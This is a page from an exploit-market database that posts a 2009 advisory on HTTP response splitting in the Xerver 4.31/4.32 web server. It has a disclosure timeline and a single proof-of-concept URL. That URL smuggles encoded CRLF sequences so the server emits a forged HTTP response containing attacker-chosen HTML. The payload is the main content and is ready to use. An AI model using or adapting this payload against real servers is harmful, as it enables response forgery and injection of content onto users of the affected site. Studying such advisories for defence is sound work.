[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xerver 4.31, 4.32 HTTP Response Splitting

Author
s4squatch
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9996
Category
web applications
Date add
18-11-2009
Platform
unsorted
=========================================
Xerver 4.31, 4.32 HTTP Response Splitting
=========================================

Xerver 4.31, 4.32 HTTP Response Splitting
 
Discovered: 04-10-08
By: SecureState R&D Team - sasquatch
Vendor Notified: 04-11-08
Vendor Response: 04-13-08
New version also vulnerable:  10-07-09 Tested (Win32 v4.32)
Vendor Notified: 10-07-09
Vendor Response: NONE
Published:  11-18-09
 
Proof of Concept:
 
/test.htm%3BHTTP%C0%AF1.0%20200%20OK%C0%8D%C0%8AContent-Length%3A%2070%C0%8D%C0%8AContent-Type%3Atext%C0%AFhtml%C0%8D%C0%8A%C0%8D%C0%8A%3Chtml%3E%3Cbody%3E%3Cimg%20src%3D%22http%3A//www.website.com/test.gif%22%3E%3C/body%3E%3C/html%3E%8D%C0%8A%C0%8D%C0%8A



#  0day.today [2024-12-25]  #